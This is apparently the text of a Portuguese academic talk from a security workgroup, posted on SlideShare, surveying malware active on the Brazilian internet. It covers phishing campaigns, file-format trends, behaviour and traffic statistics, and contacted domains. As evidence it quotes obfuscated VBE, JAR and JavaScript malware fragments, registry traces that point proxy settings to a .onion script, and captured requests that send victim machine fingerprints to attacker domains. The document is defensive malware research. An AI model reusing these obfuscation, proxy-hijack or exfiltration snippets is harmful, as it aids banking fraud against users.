SlideShare uma empresa Scribd logo

Análise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou?

Marcus Botacin
Marcus Botacin

Presentation @GTS34 = Security Workgroup of the Brazilian Internet Committee. An overview of Malware samples operation on the Brazilian Internet.

Tecnologia
1 de 38
Baixar para ler offline
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? Marcus Botacin1 1Universidade Federal do Paran´a (UFPR) mfbotacin@inf.ufpr.br @MarcusBotacin An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 1 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Neste mesmo GTS... Figura: https://tinyurl.com/yf2anfz2 An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 2 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 3 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Mensagem SMS. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 4 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Site imitando a p´agina do Banco. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 5 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Coleta de Informac¸˜oes da V´ıtima. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 6 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Transmiss˜ao de Informac¸˜oes para o Atacante. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 7 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Coleta de M´ultiplos Fatores de Autenticac¸˜ao. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 8 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: Transac¸˜ao Falhou (S´erio?). An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 9 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Era uma vez... Figura: P´agina n˜ao ´e reconhecida como Maliciosa. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 10 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 11 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 12 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 13 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Outros Tipos de phishing An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 14 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Aplicac¸˜oes Phishing. Figura: Aplicac¸˜ao Banc´aria Falsa. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 15 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Aplicac¸˜oes Phishing. Figura: Aplicac¸˜ao Banc´aria Falsa. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 16 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes O processo de infecc¸˜ao Quanto dura uma campanha de phishing? Figura: Campanha n˜ao cessa mesmo ap´os o termino do evento alvo. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 17 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 18 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Diversidade de Formatos. 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% 2012 2013 2014 2015 2016 2017 2018 Samples(%) Year Evolution of threat’s filetype PE CPL .NET DLL JAR JS VBE Figura: Distribuic¸˜ao dos Formatos de Arquivos utilizados por malware. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 19 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Ameac¸as VBE 1 Set Nics=obJWMIService.ExEcQuery("SELECT␣*␣FROM␣ Win32_NetworkAdapterConfiguration ␣WHERE␣ IPEnabled␣=␣True") C´odigo 1: Exemplar de malware VBE obtendo informac¸˜oes de sistema atrav´es da consulta SQL as bases de dados. 1 set objShell = CreateObject(CryptXor("c0+4","N0X") & ".Application") C´odigo 2: Exemplar de malware VBE instanciando um objeto a partir de uma string codificada usando operac¸˜oes XOR. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 20 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Ameac¸as JAVA 1 public static void main(String args []){ 2 File jsjmj3194 = new File ((new StringBuilder( String.valueOf(bcvsnpdbxw4095 ("THKHBI ...", abdwwhftjb7743 )))).append("x").toString ()); C´odigo 3: Exemplar de malware JAR ofuscado. 1 if(jsjmj3194.exists ()) 2 System.exit (1); C´odigo 4: Exemplar de malware JAR confirmando a infecc¸˜ao. 1 Runtime.getRuntime ().exec ((new StringBuilder ()). append("rundll32␣SHELL32.DLL , ShellExec_RunDLL ␣") .append( qOggErFmPnJO6UUHp ).append(rQ47EvtcHUKw). toString ()); C´odigo 5: Exemplar de malware JAR carregando bibliotecas externas. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 21 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Formatos de Arquivos Ameac¸as JavaScript 1 .protocol === "https:" ? "https ://s." : "http ://e.") + ".server.com/q.js" C´odigo 6: Exemplar de malware Javascript construindo uma URL em tempo de execuc¸˜ao. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 22 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 23 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos Como os exemplares s˜ao detectados? 0% 10% 20% 30% PSW Downloader Generic Win32 Delf Dropper Luhe Suspicion: Delfi Autoit_c Inject2 unknown Detection Labels Distribuition Figura: R´otulos de Detecc¸˜ao por Antiv´ırus. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 24 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos Comportamentos Observados Tabela: Comparac¸˜ao dos comportamentos observados no dataset brasileiro e no trabalho de Bayer et al. Comportamento Brasil Bayer et al. (2009) Alterac¸˜ao de hosts 0.09% 1.97% Criac¸˜ao de arquivos 24.64% 70.78% Remoc¸˜ao de arquivos 12.09% 42.57% Modificac¸˜ao de arquivos 16.09% 79.87% Instalac¸˜ao de BHOs 1.03% 1.72% Tr´afego de Rede 96.47% 55.18% Criac¸˜ao de chaves de registro 29.93% 64.71% Criac¸˜ao de processos 16.83% 52.19% An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 25 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Comportamentos Maliciosos Configurac¸˜ao Autom´atica de Proxy (PAC). 1 malware.exe|SetValueKey|HKCUSoftwareMicrosoft Internet ExplorerSearchScopes {ID}| OSDFileURL| file:///C:/ Users/Win7/AppData/Local/TNT2/ Profiles/ e0e63dcbb29a2180f8300 / ose0e63dcbb29a2180f8300 .xml C´odigo 7: Trecho de um trac¸o de execuc¸˜ao de um exemplar de malware definindo uma configurac¸˜ao de proxy via arquivo PAC. 1 malware.exe|SetValueKey|HKCUSoftwareMicrosoft WindowsCurrentVersion Internet Settings| AutoConfigURL|http:// p3vramfcx4ybpvnj .onion/ Bl5CHrZV.js?ip =143.106.Y.Z C´odigo 8: Trecho de um trac¸o de execuc¸˜ao de um exemplar de malware definindo uma configurac¸˜ao de proxy via registro do sistema operacional. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 26 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 27 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede Uso de Protocolos Tabela: Comparac¸˜ao do tr´afego de rede exibido pelos exemplares de malware brasileiros e os observador por Bayer et al. Protocolo 2012(T) 2013(T) 2014(T) 2015(T) 2016(T) 2017(T) Bayer(09) TCP 40.87% 41.24% 56.19% 64.24% 74.86% 84.85% 45.74% UDP 52.76% 54.74% 52.00% 59.42% 74.86% 84.85% 27.34% ICMP 1.28% 1.70% 1.33% 5.63% 0.57% 1.17% 7.58% DNS 52.69% 54.73% 51.98% 49.04% 47.43% 74.59% 24.53% HTTP 38.63% 39.69% 52.03% 44.93% 74.86% 84.38% 20.75% SSL 5.30% 5.62% 4.64% 6.53% 10.29% 26.57% 0.23% SMTP 0.21% 0.01% 0.06% 0.21% 0.0% 0.0% N.A.1 1 N˜ao Dispon´ıvel An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 28 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede Exfiltrac¸˜ao de Informac¸˜oes. 1 GET maisumavezconta .info/escrita /? Client= Y29udGFkb3IwMw ==& GetMacAddress= NTI6NTQ6MDA6QTA6MDQ6MTk =& GetWinVersionAsStringWinArch = V2luZG93cyA3ICg2NCk =& VersaoModulo=djE=& GetPCName=V0lON19WTTE =& DetectPlugin=TuNv& DetectAntiVirus =T0ZG C´odigo 9: Trecho de um tr´afego de rede exemplificando um exemplar de malware que realiza o fingerprint da m´aquina infectada. 1 GET counter1.webcontadores.com :8080/ private/pointeur /pointeur.gif?|<hash >|600*800| pt|32|< serial >| computer|windows |7| internet + explorer |7| Brazil| BR|X|Y|City|University | -14400|0|1432126706| ok| C´odigo 10: Trecho de um tr´afego de rede exemplificando a coleta de informac¸˜oes de geolocalizac¸˜ao. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 29 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede De onde partem os Ataques? Figura: Mapa dos Ataques. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 30 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Tr´afego de Rede Dom´ınios Contatados Tabela: Tr´afego de Rede por dom´ınio (top-10). % Exemplares % Payloads Host 22.45% None google.com 22.43% None google-public-dns-a.google.com 5.34% 9.71% akamaitechnologies.com 4.50% 8.18 1e100.net 3.32% 6.04 amazonaws.com 1.50% 2.73 clouduol.com.br 1.27% 2.31 locaweb.com.br 0.94% None uol.com.br 0.77% None secureserver.net 0.69% None a-msedge.net An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 31 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Limitac¸˜oes T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 32 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Limitac¸˜oes Limitac¸˜oes & Trabalhos Futuros Limitac¸˜oes Apenas sistemas Windows. Apenas aplicac¸˜oes em modo usu´ario. Trabalhos Futuros Ampliac¸˜ao das an´alises. Monitorac¸˜ao cont´ınua. Colaborac¸˜oes e Parcerias. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 33 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Conclus˜oes T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 34 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Conclus˜oes Conclus˜oes Principais Descobertas Infecc¸˜oes via phishing. Aplicac¸˜oes falsas. Variados formatos de arquivo. Exfiltrac¸˜ao de informac¸˜oes sens´ıveis. Armazenamento em servic¸os de nuvem. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 35 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes Conclus˜oes Chamado para Ac¸˜ao! https://corvus.inf.ufpr.br/ Figura: Sistema web de an´alise de malware. An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 36 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes D´uvidas? T´opicos 1 Introduc¸˜ao O processo de infecc¸˜ao 2 An´alise dos Exemplares Coletados Formatos de Arquivos Comportamentos Maliciosos Tr´afego de Rede 3 Conclus˜oes Limitac¸˜oes Conclus˜oes D´uvidas? An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 37 / 38 GTS’34
Introduc¸˜ao An´alise dos Exemplares Coletados Conclus˜oes D´uvidas? Contato mfbotacin@inf.ufpr.br @MarcusBotacin An´alise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? 38 / 38 GTS’34

Recomendados

Mil e uma noites de malware no Brasil
Mil e uma noites de malware no BrasilMil e uma noites de malware no Brasil
Mil e uma noites de malware no Brasil
Marcus Botacin
 
Duly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdfDuly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdf
HelenaReis48
 
Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...
Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...
Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...
Marcus Botacin
 
XVII SBSEG: Análise Transparente de Malware com Suporte por Hardware
XVII SBSEG: Análise Transparente de Malware com Suporte por HardwareXVII SBSEG: Análise Transparente de Malware com Suporte por Hardware
XVII SBSEG: Análise Transparente de Malware com Suporte por Hardware
Marcus Botacin
 
Os desafios de coletar e monitorar URLs que apontam para Malwares
Os desafios de coletar e monitorar URLs que apontam para MalwaresOs desafios de coletar e monitorar URLs que apontam para Malwares
Os desafios de coletar e monitorar URLs que apontam para Malwares
Andre_C10002
 
Análise de Malware
Análise de MalwareAnálise de Malware
Análise de Malware
Renato Basante Borbolla
 
Apresentação Técnica - ISA SHOW 2012
Apresentação Técnica - ISA SHOW 2012Apresentação Técnica - ISA SHOW 2012
Apresentação Técnica - ISA SHOW 2012
TI Safe
 
Relatorio urna
Relatorio urnaRelatorio urna
Relatorio urna
João Rufino de Sales
 

Recomendados

Mil e uma noites de malware no Brasil
Mil e uma noites de malware no BrasilMil e uma noites de malware no Brasil
Mil e uma noites de malware no Brasil
Marcus Botacin
 
Duly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdfDuly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdf
HelenaReis48
 
Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...
Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...
Monitoração de comportamento de malware em sistemas operacionais Windows NT 6...
Marcus Botacin
 
XVII SBSEG: Análise Transparente de Malware com Suporte por Hardware
XVII SBSEG: Análise Transparente de Malware com Suporte por HardwareXVII SBSEG: Análise Transparente de Malware com Suporte por Hardware
XVII SBSEG: Análise Transparente de Malware com Suporte por Hardware
Marcus Botacin
 
Os desafios de coletar e monitorar URLs que apontam para Malwares
Os desafios de coletar e monitorar URLs que apontam para MalwaresOs desafios de coletar e monitorar URLs que apontam para Malwares
Os desafios de coletar e monitorar URLs que apontam para Malwares
Andre_C10002
 
Análise de Malware
Análise de MalwareAnálise de Malware
Análise de Malware
Renato Basante Borbolla
 
Apresentação Técnica - ISA SHOW 2012
Apresentação Técnica - ISA SHOW 2012Apresentação Técnica - ISA SHOW 2012
Apresentação Técnica - ISA SHOW 2012
TI Safe
 
Relatorio urna
Relatorio urnaRelatorio urna
Relatorio urna
João Rufino de Sales
 
Semi projecto
Semi projectoSemi projecto
Semi projecto
apgrupo8
 
[In]segurança mobile: Android na Segurança da Informação
[In]segurança mobile: Android na Segurança da Informação[In]segurança mobile: Android na Segurança da Informação
[In]segurança mobile: Android na Segurança da Informação
Henrique Galdino
 
Insegurança mobile: Android na Segurança da Informação
Insegurança mobile: Android na Segurança da InformaçãoInsegurança mobile: Android na Segurança da Informação
Insegurança mobile: Android na Segurança da Informação
Henrique Galdino
 
[In]Segurança Mobile
[In]Segurança Mobile[In]Segurança Mobile
[In]Segurança Mobile
Danilo Vaz
 
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoPalestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
As Zone
 
Facsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um poucoFacsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um pouco
Thiago Dieb
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
Alisson Fuckner
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informação
Samantha Nunes
 
Desenvolvimento em Comunidade
Desenvolvimento em ComunidadeDesenvolvimento em Comunidade
Desenvolvimento em Comunidade
Pedro Dias
 
Dos crimes contra a inviolabilidade do sistema informático
Dos crimes contra a inviolabilidade do sistema informáticoDos crimes contra a inviolabilidade do sistema informático
Dos crimes contra a inviolabilidade do sistema informático
José Mariano Araujo Filho
 
Confraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviConfraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan Davi
Jhonathan Davi
 
Backtrack 4 Final Distro Penetration Testing Unimep2009
Backtrack 4 Final Distro Penetration Testing Unimep2009Backtrack 4 Final Distro Penetration Testing Unimep2009
Backtrack 4 Final Distro Penetration Testing Unimep2009
Mauro Risonho de Paula Assumpcao
 
Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...
Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...
Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...
Marcus Botacin
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Data Security
 
"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda
SegInfo
 
Análise de malware coletado entre 2012-2015
Análise de malware coletado entre 2012-2015Análise de malware coletado entre 2012-2015
Análise de malware coletado entre 2012-2015
Marcus Botacin
 
Testes de unidade e TDD SoLiSC 2011
Testes de unidade e TDD SoLiSC 2011Testes de unidade e TDD SoLiSC 2011
Testes de unidade e TDD SoLiSC 2011
Luís Cobucci
 
Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”
Jefferson Costa
 
Crimes Digitais e Computacao Forense OAB Campinas
Crimes Digitais e Computacao Forense OAB CampinasCrimes Digitais e Computacao Forense OAB Campinas
Crimes Digitais e Computacao Forense OAB Campinas
Vaine Luiz Barreira, MBA
 
Mallwares
MallwaresMallwares
Mallwares
Fatec Jales
 
Machine Learning by Examples - Marcus Botacin - TAMU 2024
Machine Learning by Examples - Marcus Botacin - TAMU 2024Machine Learning by Examples - Marcus Botacin - TAMU 2024
Machine Learning by Examples - Marcus Botacin - TAMU 2024
Marcus Botacin
 
Near-memory & In-Memory Detection of Fileless Malware
Near-memory & In-Memory Detection of Fileless MalwareNear-memory & In-Memory Detection of Fileless Malware
Near-memory & In-Memory Detection of Fileless Malware
Marcus Botacin
 

Mais conteúdo relacionado

Semelhante a Análise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou?

Semi projecto
Semi projectoSemi projecto
Semi projecto
apgrupo8
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
Alisson Fuckner
 

Semelhante a Análise do Malware Ativo na Internet Brasileira: 4 anos depois. O que mudou? (20)

Semi projecto
Semi projectoSemi projecto
Semi projecto
 
[In]segurança mobile: Android na Segurança da Informação
[In]segurança mobile: Android na Segurança da Informação[In]segurança mobile: Android na Segurança da Informação
[In]segurança mobile: Android na Segurança da Informação
 
Insegurança mobile: Android na Segurança da Informação
Insegurança mobile: Android na Segurança da InformaçãoInsegurança mobile: Android na Segurança da Informação
Insegurança mobile: Android na Segurança da Informação
 
[In]Segurança Mobile
[In]Segurança Mobile[In]Segurança Mobile
[In]Segurança Mobile
 
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoPalestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
 
Facsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um poucoFacsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um pouco
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informação
 
Desenvolvimento em Comunidade
Desenvolvimento em ComunidadeDesenvolvimento em Comunidade
Desenvolvimento em Comunidade
 
Dos crimes contra a inviolabilidade do sistema informático
Dos crimes contra a inviolabilidade do sistema informáticoDos crimes contra a inviolabilidade do sistema informático
Dos crimes contra a inviolabilidade do sistema informático
 
Confraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviConfraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan Davi
 
Backtrack 4 Final Distro Penetration Testing Unimep2009
Backtrack 4 Final Distro Penetration Testing Unimep2009Backtrack 4 Final Distro Penetration Testing Unimep2009
Backtrack 4 Final Distro Penetration Testing Unimep2009
 
Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...
Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...
Uma Visão Geral do Malware Ativo no Espaço Nacional da Internet entre 2012 e ...
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda"Cenário de Ameaças em 2011" por Mariano Miranda
"Cenário de Ameaças em 2011" por Mariano Miranda
 
Análise de malware coletado entre 2012-2015
Análise de malware coletado entre 2012-2015Análise de malware coletado entre 2012-2015
Análise de malware coletado entre 2012-2015
 
Testes de unidade e TDD SoLiSC 2011
Testes de unidade e TDD SoLiSC 2011Testes de unidade e TDD SoLiSC 2011
Testes de unidade e TDD SoLiSC 2011
 
Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”Minicurso – Forense computacional “Análise de redes”
Minicurso – Forense computacional “Análise de redes”
 
Crimes Digitais e Computacao Forense OAB Campinas
Crimes Digitais e Computacao Forense OAB CampinasCrimes Digitais e Computacao Forense OAB Campinas
Crimes Digitais e Computacao Forense OAB Campinas
 
Mallwares
MallwaresMallwares
Mallwares
 

Mais de Marcus Botacin

Mais de Marcus Botacin (20)

Machine Learning by Examples - Marcus Botacin - TAMU 2024
Machine Learning by Examples - Marcus Botacin - TAMU 2024Machine Learning by Examples - Marcus Botacin - TAMU 2024
Machine Learning by Examples - Marcus Botacin - TAMU 2024
 
Near-memory & In-Memory Detection of Fileless Malware
Near-memory & In-Memory Detection of Fileless MalwareNear-memory & In-Memory Detection of Fileless Malware
Near-memory & In-Memory Detection of Fileless Malware
 
GPThreats-3: Is Automated Malware Generation a Threat?
GPThreats-3: Is Automated Malware Generation a Threat?GPThreats-3: Is Automated Malware Generation a Threat?
GPThreats-3: Is Automated Malware Generation a Threat?
 
[HackInTheBOx] All You Always Wanted to Know About Antiviruses
[HackInTheBOx] All You Always Wanted to Know About Antiviruses[HackInTheBOx] All You Always Wanted to Know About Antiviruses
[HackInTheBOx] All You Always Wanted to Know About Antiviruses
 
[Usenix Enigma\ Why Is Our Security Research Failing? Five Practices to Change!
[Usenix Enigma\ Why Is Our Security Research Failing? Five Practices to Change![Usenix Enigma\ Why Is Our Security Research Failing? Five Practices to Change!
[Usenix Enigma\ Why Is Our Security Research Failing? Five Practices to Change!
 
Hardware-accelerated security monitoring
Hardware-accelerated security monitoringHardware-accelerated security monitoring
Hardware-accelerated security monitoring
 
How do we detect malware? A step-by-step guide
How do we detect malware? A step-by-step guideHow do we detect malware? A step-by-step guide
How do we detect malware? A step-by-step guide
 
Among Viruses, Trojans, and Backdoors:Fighting Malware in 2022
Among Viruses, Trojans, and Backdoors:Fighting Malware in 2022Among Viruses, Trojans, and Backdoors:Fighting Malware in 2022
Among Viruses, Trojans, and Backdoors:Fighting Malware in 2022
 
Extraindo Caracterı́sticas de Arquivos Binários Executáveis
Extraindo Caracterı́sticas de Arquivos Binários ExecutáveisExtraindo Caracterı́sticas de Arquivos Binários Executáveis
Extraindo Caracterı́sticas de Arquivos Binários Executáveis
 
On the Malware Detection Problem: Challenges & Novel Approaches
On the Malware Detection Problem: Challenges & Novel ApproachesOn the Malware Detection Problem: Challenges & Novel Approaches
On the Malware Detection Problem: Challenges & Novel Approaches
 
All You Need to Know to Win a Cybersecurity Adversarial Machine Learning Comp...
All You Need to Know to Win a Cybersecurity Adversarial Machine Learning Comp...All You Need to Know to Win a Cybersecurity Adversarial Machine Learning Comp...
All You Need to Know to Win a Cybersecurity Adversarial Machine Learning Comp...
 
Near-memory & In-Memory Detection of Fileless Malware
Near-memory & In-Memory Detection of Fileless MalwareNear-memory & In-Memory Detection of Fileless Malware
Near-memory & In-Memory Detection of Fileless Malware
 
Does Your Threat Model Consider Country and Culture? A Case Study of Brazilia...
Does Your Threat Model Consider Country and Culture? A Case Study of Brazilia...Does Your Threat Model Consider Country and Culture? A Case Study of Brazilia...
Does Your Threat Model Consider Country and Culture? A Case Study of Brazilia...
 
Integridade, confidencialidade, disponibilidade, ransomware
Integridade, confidencialidade, disponibilidade, ransomwareIntegridade, confidencialidade, disponibilidade, ransomware
Integridade, confidencialidade, disponibilidade, ransomware
 
An Empirical Study on the Blocking of HTTP and DNS Requests at Providers Leve...
An Empirical Study on the Blocking of HTTP and DNS Requests at Providers Leve...An Empirical Study on the Blocking of HTTP and DNS Requests at Providers Leve...
An Empirical Study on the Blocking of HTTP and DNS Requests at Providers Leve...
 
On the Security of Application Installers & Online Software Repositories
